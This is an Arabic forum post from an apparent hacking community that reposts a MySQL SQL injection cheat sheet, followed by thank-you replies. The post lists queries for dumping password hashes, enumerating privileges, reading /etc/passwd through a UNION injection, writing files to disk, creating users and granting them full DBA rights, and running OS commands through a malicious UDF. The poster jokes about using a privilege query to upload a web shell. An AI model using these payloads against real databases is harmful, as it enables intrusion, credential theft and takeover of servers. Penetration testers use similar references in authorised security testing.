![]() |
Injection Cheat Sheet - # MySqL
السلام عليكم ورحمه الله وبركاته
اليوم جبت لكم موضوع روعه تحبونه كلكم لكن الي راح تزعلو منه اني مش راح اترجم لانه امر ومعناه وما يصح ترجمته ركزو تفهمو ن :] mysql-sql-injection-cheat-sheet Version كود:
SELECT @@versionComments كود:
SELECT 1; #commentCurrent User كود:
SELECT user();List Users كود:
SELECT user FROM mysql.user; -- privList Password Hashes كود:
SELECT host, user, password FROM mysql.user; -- privPassword Cracker . List Privileges كود:
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privsكود:
فوق امر برايفت عشان نرفع شيل هع هع خليكم تكتشفونه لحالكم ما رح اكمل كلام ............ كود:
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)كود:
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columnsList DBA Accounts كود:
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';كود:
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # privCurrent Database كود:
SELECT database()List Databases كود:
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0كود:
SELECT distinct(db) FROM mysql.db -- priv8List Tables كود:
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'Find Tables From Column Name كود:
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'Select Nth Row كود:
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0Select Nth Char كود:
SELECT substr('abcd', 3, 1); # returns cBitwise AND كود:
SELECT 6 & 2; # returns 2كود:
SELECT 6 & 1; # returns 0ASCII Value -> Char كود:
SELECT char(65); # returns AChar -> ASCII Value كود:
SELECT ascii('A'); # returns 65Casting كود:
SELECT cast('1' AS unsigned integer);String Concatenation كود:
SELECT CONCAT('A','B'); #returns ABIf Statement كود:
Case Statement كود:
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns AAvoiding Quotes كود:
Time Delay كود:
SELECT BENCHMARK(1000000,MD5('A'));Command Execution بصراحه اول مره اسمع فيها بس قويه كثير :S بحاول انزل لكم عليها فيديو كود:
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.Local File Access كود:
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read كود:
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file systemCreate Users كود:
CREATE USER test1 IDENTIFIED BY 'pass1'; -- privDelete Users كود:
DROP USER test1; -- privMake User DBA كود:
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- privLocation of DB files كود:
SELECT @@datadirاتمنا انكم تفهمو الاستعلاماات :D موفقين |
[align=center]مشكور ياغالي على الدرس الرائع والاومر الجديدة والرائع جدا
ابداعك مالة مثيل ابدا [/align] |
يعطيك العافيه اخ عبدالرحمن ابداع ماله حدود ..
|
[align=center]تسلم عالاوامر يا أستاذ الحقن
واصل... تحياتي لك[/align] |
[align=center]بارك الله فيك وجزاك كل خير
دائما مبدع واصل ابداعك ياغالي[/align] |
مشكور ياغالي على الدرس الرائع والاومر الجديدة والرائع جدا
|
| الساعة الآن 03:34 AM |
[ vBspiders.Com Network ]